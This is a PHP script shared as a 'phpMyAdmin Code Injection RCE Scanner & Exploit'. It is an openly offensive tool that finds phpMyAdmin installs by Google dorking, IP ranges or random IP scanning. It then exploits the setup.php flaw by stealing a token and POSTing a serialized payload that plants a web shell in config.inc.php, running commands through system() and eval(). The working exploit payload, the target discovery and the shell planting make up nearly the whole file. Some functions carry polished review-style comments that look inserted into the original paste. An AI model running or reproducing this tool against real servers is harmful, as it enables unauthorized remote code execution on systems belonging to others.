JuanDeLemos

[SCANNER] phpMyAdmin Code Injection RCE Scanner & Exploit

Dec 14th, 2015
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '256M');
  6. ini_set('display_errors', 0);
  7. ini_set('max_execution_time', 0);
  8. ini_set('allow_url_fopen', 1);
  9. /*
  10.  * ***************************************************************
  11.   pmaPWN.php - d3ck4, hacking.expose@gmail.com
  12.   phpMyAdmin Code Injection RCE Scanner & Exploit
  13.   This is PHP version original http://milw0rm.com/exploits/8921
  14.   credit: Greg Ose, pagvac @ gnucitizen.org
  15.   greetz: Hacking Expose!, HM Security, darkc0de
  16.  * ***************************************************************
  17.  
  18.   EDITADO POR GoogleINURL
  19.   blog.inurl.com.br
  20.  */
  21.  
  22.  
  23. $list = array(
  24.     '/phpmyadmin/',
  25.     '/phpMyAdmin/',
  26.     '/PMA/',
  27.     '/pma/',
  28.     '/admin/',
  29.     '/dbadmin/',
  30.     '/mysql/',
  31.     '/myadmin/',
  32.     '/phpmyadmin2/',
  33.     '/phpMyAdmin2/',
  34.     '/phpMyAdmin-2/',
  35.     '/php-my-admin/',
  36.     '/phpMyAdmin-2.2.3/',
  37.     '/phpMyAdmin-2.2.6/',
  38.     '/phpMyAdmin-2.5.1/',
  39.     '/phpMyAdmin-2.5.4/',
  40.     '/phpMyAdmin-2.5.5-rc1/',
  41.     '/phpMyAdmin-2.5.5-rc2/',
  42.     '/phpMyAdmin-2.5.5/',
  43.     '/phpMyAdmin-2.5.5-pl1/',
  44.     '/phpMyAdmin-2.5.6-rc1/',
  45.     '/phpMyAdmin-2.5.6-rc2/',
  46.     '/phpMyAdmin-2.5.6/',
  47.     '/phpMyAdmin-2.5.7/',
  48.     '/phpMyAdmin-2.5.7-pl1/',
  49.     '/phpMyAdmin-2.6.0-alpha/',
  50.     '/phpMyAdmin-2.6.0-alpha2/',
  51.     '/phpMyAdmin-2.6.0-beta1/',
  52.     '/phpMyAdmin-2.6.0-beta2/',
  53.     '/phpMyAdmin-2.6.0-rc1/',
  54.     '/phpMyAdmin-2.6.0-rc2/',
  55.     '/phpMyAdmin-2.6.0-rc3/',
  56.     '/phpMyAdmin-2.6.0/',
  57.     '/phpMyAdmin-2.6.0-pl1/',
  58.     '/phpMyAdmin-2.6.0-pl2/',
  59.     '/phpMyAdmin-2.6.0-pl3/',
  60.     '/phpMyAdmin-2.6.1-rc1/',
  61.     '/phpMyAdmin-2.6.1-rc2/',
  62.     '/phpMyAdmin-2.6.1/',
  63.     '/phpMyAdmin-2.6.1-pl1/',
  64.     '/phpMyAdmin-2.6.1-pl2/',
  65.     '/phpMyAdmin-2.6.1-pl3/',
  66.     '/phpMyAdmin-2.6.2-rc1/',
  67.     '/phpMyAdmin-2.6.2-beta1/',
  68.     '/phpMyAdmin-2.6.2-rc1/',
  69.     '/phpMyAdmin-2.6.2/',
  70.     '/phpMyAdmin-2.6.2-pl1/',
  71.     '/phpMyAdmin-2.6.3/',
  72.     '/phpMyAdmin-2.6.3-rc1/',
  73.     '/phpMyAdmin-2.6.3/',
  74.     '/phpMyAdmin-2.6.3-pl1/',
  75.     '/phpMyAdmin-2.6.4-rc1/',
  76.     '/phpMyAdmin-2.6.4-pl1/',
  77.     '/phpMyAdmin-2.6.4-pl2/',
  78.     '/phpMyAdmin-2.6.4-pl3/',
  79.     '/phpMyAdmin-2.6.4-pl4/',
  80.     '/phpMyAdmin-2.6.4/',
  81.     '/phpMyAdmin-2.7.0-beta1/',
  82.     '/phpMyAdmin-2.7.0-rc1/',
  83.     '/phpMyAdmin-2.7.0-pl1/',
  84.     '/phpMyAdmin-2.7.0-pl2/',
  85.     '/phpMyAdmin-2.7.0/',
  86.     '/phpMyAdmin-2.8.0-beta1/',
  87.     '/phpMyAdmin-2.8.0-rc1/',
  88.     '/phpMyAdmin-2.8.0-rc2/',
  89.     '/phpMyAdmin-2.8.0/',
  90.     '/phpMyAdmin-2.8.0.1/',
  91.     '/phpMyAdmin-2.8.0.2/',
  92.     '/phpMyAdmin-2.8.0.3/',
  93.     '/phpMyAdmin-2.8.0.4/',
  94.     '/phpMyAdmin-2.8.1-rc1/',
  95.     '/phpMyAdmin-2.8.1/',
  96.     '/phpMyAdmin-2.8.2/',
  97.     '/sqlmanager/',
  98.     '/mysqlmanager/',
  99.     '/p/m/a/',
  100.     '/PMA2005/',
  101.     '/pma2005/',
  102.     '/phpmanager/',
  103.     '/php-myadmin/',
  104.     '/phpmy-admin/',
  105.     '/webadmin/',
  106.     '/sqlweb/',
  107.     '/websql/',
  108.     '/webdb/',
  109.     '/mysqladmin/',
  110.     '/mysql-admin/',
  111. );
  112.  
/**
 * Normalise a list of host strings to unique "http://<host>" entries.
 *
 * Each input value is prefixed with "http://" and passed to parse_url(); only
 * the 'host' component is kept, so any scheme-less path, port, query or
 * fragment in the original string is discarded. The result is de-duplicated
 * with array_unique() and then passed through array_filter() with no callback,
 * which drops falsy entries only.
 *
 * @param array $array  raw host / URL strings; defaults to an empty array
 * @return array|null   unique "http://host" strings keyed as array_unique left
 *                      them (keys are not re-indexed), or NULL when $array is
 *                      empty
 *
 * NOTE(review): $real['host'] is read without checking that parse_url()
 * succeeded or that the key exists. An entry with no recognisable host becomes
 * the bare string "http://", which is non-empty and therefore survives the
 * array_filter() step rather than being removed.
 */
function filterHost($array = array()) {
    if (!empty($array)) {
        foreach ($array as $value) {
            // Force a scheme so parse_url() treats the leading token as the host.
            $real = parse_url("http://{$value}");
            $_[] = "http://" . $real['host'];
        }

        // array_unique() keeps the first occurrence; array_filter() with no
        // callback removes only falsy values (e.g. '' or '0').
        return array_filter(array_unique($_));
    } else {

        return NULL;
    }
}
  126.  
  127. ################################################################################
  128. #GENERATOR RANGE IP#############################################################
  129. ################################################################################
  130.  
  131. function __generatorRangeIP($range) {
  132.  
  133.     $ip_ = explode(',', $range);
  134.     if (is_array($ip_)) {
  135.  
  136.         $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  137.         while ($_[0] <= $_[1]) {
  138.  
  139.             $ips[] = "http://" . long2ip($_[0]);
  140.             $_[0] ++;
  141.         }
  142.     } else {
  143.  
  144.         return FALSE;
  145.     }
  146.  
  147.     return $ips;
  148. }
  149.  
  150. ################################################################################
  151. #GENERATOR RANGE IP RANDOM######################################################
  152. ################################################################################
  153.  
  154. function __generatorIPRandom($cont) {
  155.  
  156.     $cont[0] = 0;
  157.     while ($cont[0] < $cont[1]) {
  158.  
  159.         $bloc[0] = rand(0, 255);
  160.         $bloc[1] = rand(0, 255);
  161.         $bloc[2] = rand(0, 255);
  162.         $bloc[3] = rand(0, 255);
  163.         $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
  164.  
  165.         $cont[0] ++;
  166.     }
  167.     return array_unique($ip);
  168. }
  169.  
  170. $banner = "
  171. \t---------------------------------------------------------------
  172. \t        phpMyAdmin Code Injection RCE Scanner & Exploit
  173. \t  This is PHP version original http://milw0rm.com/exploits/8921
  174. \t        Edited by GoogleINURL - http://blog.inurl.com.br
  175. \t---------------------------------------------------------------
  176. \n";
  177.  
  178. if ($argc > 1) {
  179.     print $banner;
  180.     print "Usage: php $argv[0] \n";
  181.     exit;
  182. }
  183.  
  184. print $banner;
  185. print "\n";
  186. $Handlex = FOpen("pmaPWN.log", "a+");
  187. FWrite($Handlex, $banner);
  188.  
  189. print "[-] Master, where you want to go today? \n";
  190. print "[-] OPTIONS: \n";
  191. print "---------------------------------------------------------------------\n";
  192. print "[+] DORKING:         [ 1 ]\n";
  193. print "[+] RANGE IP:        [ 2 ]\n";
  194. print "[+] RANGE IP RANDOM: [ 3 ]\n";
  195. print "[+] VALUES FILE:     [ 4 ]\n";
  196. print "---------------------------------------------------------------------\n";
  197. fwrite(STDOUT, "\nGoogleINURL@scan:/options#  ");
  198. $op = trim(fgets(STDIN));
  199.  
  200. if ($op == 1) {
  201.     print "[-] example: intitle:phpMyAdmin\n";
  202.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork#  ");
  203.     $dork = urlencode(trim(fgets(STDIN)));
  204.     print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
  205.     FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
  206. //for($i = 0; $i <= 2; $i+=100) {
  207.     $ch = curl_init();
  208.     curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
  209.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  210.     curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  211.     curl_setopt($ch, CURLOPT_HEADER, 1);
  212.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  213.     curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
  214.     curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
  215.     $pg = curl_exec($ch);
  216.     curl_close($ch);
  217.  
  218. # MODIFICADO MOTOR DE BUSCA E REG DE VALIDAÇÃO BY GoogleINURL - 26/jun/2015
  219.    $html = str_replace('href="/url?q=', 'href="', $pg);
  220.     $html = str_replace('https://www.google.com.br', '', $html);
  221.     $html = str_replace('http://www.phpmyadmin.net', '', $html);
  222.  
  223.     preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
  224.     $_ = array_filter(array_unique($links[2]));
  225.  
  226. //if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
  227. //}
  228.     $res = filterHost($_);
  229. }
  230.  
  231. if ($op == 2) {
  232.     print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
  233.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range#  ");
  234.     $value = (trim(fgets(STDIN)));
  235.     $res = __generatorRangeIP($value);
  236. }
  237.  
  238. if ($op == 3) {
  239.     print "\n[-] Amount of IPS / example: 255 \n";
  240.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand#  ");
  241.     $value = (trim(fgets(STDIN)));
  242.     $res = __generatorIPRandom(array([0] => 0, 1 => $value));
  243. }
  244.  
  245. if ($op == 4) {
  246.     print "[-] example: hosts.txt ";
  247.     fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file#  ");
  248.     $value = (trim(fgets(STDIN)));
  249.     $res = array_unique(array_filter(explode("\n", file_get_contents($value))));
  250. }
  251.  
  252.  
  253.  
  254. (!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
  255. print "---------------------------------------------------------------------\n";
  256. $total = count($res);
  257. print "\n[+] Done. $total rows return.\n";
  258. FWrite($Handlex, "[+] Done. $total rows return.\n");
  259. FClose($Handlex);
  260.  
  261. //   foreach($res as $key) {
  262. $cont = 1;
  263. foreach ($res as $url) {
  264.  
  265.     $Handlex = FOpen("pmaPWN.log", "a+");
  266.     //$real = parse_url("http://{$target}");
  267.     //$url = "http://" . $real['host'];
  268.     print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
  269.     $cont++;
  270.     FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
  271.     FClose($Handlex);
  272.     sleep(5);
  273.     $curlHandle = curl_multi_init();
  274.     for ($i = 0; $i < count($list); $i++)
  275.         $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
  276.     ExecHandle($curlHandle);
  277.     for ($i = 0; $i < count($list); $i++) {
  278.         $text[$i] = curl_multi_getcontent($curl[$i]);
  279.         //echo $url.$list[$i]."\n";
  280.         $Handlex = FOpen("pmaPWN.log", "a+");
  281.         if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
  282.             print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
  283.             print "\n[+] Testing vulnerable, wait sec..\n";
  284.             FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
  285.             FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
  286.             if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
  287.                 print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
  288.                 FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
  289.             }
  290.             FClose($Handlex);
  291.             exploit_site($url . $list[$i]);
  292.         }
  293.     }
  294.     for ($i = 0; $i < count($list); $i++)//remove the handles
  295.         curl_multi_remove_handle($curlHandle, $curl[$i]);
  296.     curl_multi_close($curlHandle);
  297.     sleep(5);
  298. }
  299.  
  300. // }
  301.  
/**
 * Create a cURL easy handle for $url and register it with a multi handle.
 *
 * The easy handle is configured to return the response body as a string
 * (CURLOPT_RETURNTRANSFER) without response headers (CURLOPT_HEADER = 0), and
 * to give up after 10 seconds for both the connection and the whole transfer.
 * No TLS options are set here, so libcurl's defaults apply. Ownership stays
 * with the caller: this function neither removes the handle from the multi
 * handle nor closes it.
 *
 * @param resource|\CurlMultiHandle $curlHandle  multi handle to attach to
 *                                               (taken by reference)
 * @param string                    $url         absolute URL to fetch
 * @return resource|\CurlHandle                  the newly created easy handle
 */
function addHandle(&$curlHandle, $url) {
    $cURL = curl_init();
    curl_setopt($cURL, CURLOPT_URL, $url);
    curl_setopt($cURL, CURLOPT_HEADER, 0);
    curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
    curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT, 10);
    // Queue the transfer on the multi handle; it does not start until the
    // caller drives curl_multi_exec().
    curl_multi_add_handle($curlHandle, $cURL);
    return $cURL;
}
  312.  
//execute the handles until the flag passed
// to function is no longer greater than 0
/**
 * Drive every easy handle attached to $curlHandle until no transfer is active.
 *
 * curl_multi_exec() is called repeatedly; its second argument receives the
 * number of transfers still running, and the loop ends once that count is no
 * longer greater than 0. There is no curl_multi_select() call between
 * iterations, so this is a busy-wait that spins on the CPU while waiting for
 * network I/O. The return value of curl_multi_exec() (e.g. an error status)
 * is ignored.
 *
 * @param resource|\CurlMultiHandle $curlHandle  multi handle holding the
 *                                               queued transfers (by reference)
 * @return void
 */
function ExecHandle(&$curlHandle) {
    // Running-transfer count written back by curl_multi_exec().
    $flag = null;
    do {
//fetch pages in parallel
        curl_multi_exec($curlHandle, $flag);
    } while ($flag > 0);
}
  322.  
  323. function exploit_site($url) {
  324.     $ch = curl_init();
  325.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  326.     curl_setopt($ch, CURLOPT_HEADER, 1);
  327.     curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  328.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  329.     curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
  330.     $result = curl_exec($ch);
  331.     curl_close($ch);
  332.     $ch2 = curl_init();
  333.     curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  334.     curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  335.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  336.     curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
  337.     $result2 = curl_exec($ch2);
  338.     curl_close($ch2);
  339.     //print $url;
  340.     if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  341.         print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  342.         print "\n[+] Exploiting, wait sec..\n";
  343.         $Handlex = FOpen("pmaPWN.log", "a+");
  344.         FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  345.         FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  346.         FClose($Handlex);
  347.         exploit($url);
  348.     } else {
  349.         $Handlex = FOpen("pmaPWN.log", "a+");
  350.         print "\n[-] Shit! no luck.. not vulnerable\n";
  351.         FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  352.         FClose($Handlex);
  353.     }
  354. }
  355.  
  356. function exploit($w00t) {
  357.     $Handlex = FOpen("pmaPWN.log", "a+");
  358.     $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  359.     //first get cookie + token
  360.     $curl = curl_init();
  361.     curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
  362.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  363.     curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  364.     curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  365.     curl_setopt($curl, CURLOPT_TIMEOUT, 100);
  366.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  367.     curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  368.     curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  369.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  370.     curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  371.     curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  372.     $result = curl_exec($curl);
  373.     curl_close($curl);
  374.     if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
  375.         ;
  376.  
  377.     $token = $matches[1][1];
  378.     if ($token != '') {
  379.         print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  380.         FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
  381.         $payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  382.         print "\n[+] Sending evil payload mwahaha.. \n";
  383.         FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
  384.         $curl = curl_init();
  385.         curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
  386.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  387.         curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  388.         curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  389.         curl_setopt($curl, CURLOPT_REFERER, $w00t);
  390.         curl_setopt($curl, CURLOPT_POST, true);
  391.         curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  392.         curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  393.         curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  394.         curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  395.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  396.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  397.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  398.         $result = curl_exec($curl);
  399.         curl_close($curl);
  400.  
  401.         print "\n[!] w00t! w00t! You should now have shell here";
  402.         print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
  403.         print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  404.         FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  405.         FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
  406.     } else {
  407.         print "\n[!] Shit! no luck.. not vulnerable\n";
  408.         FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
  409.         return false;
  410.     }
  411.     FClose($Handlex);
  412.     if (file_exists('exploitcookie.txt')) {
  413.         unlink('exploitcookie.txt');
  414.     }
  415.     //exit();
  416. }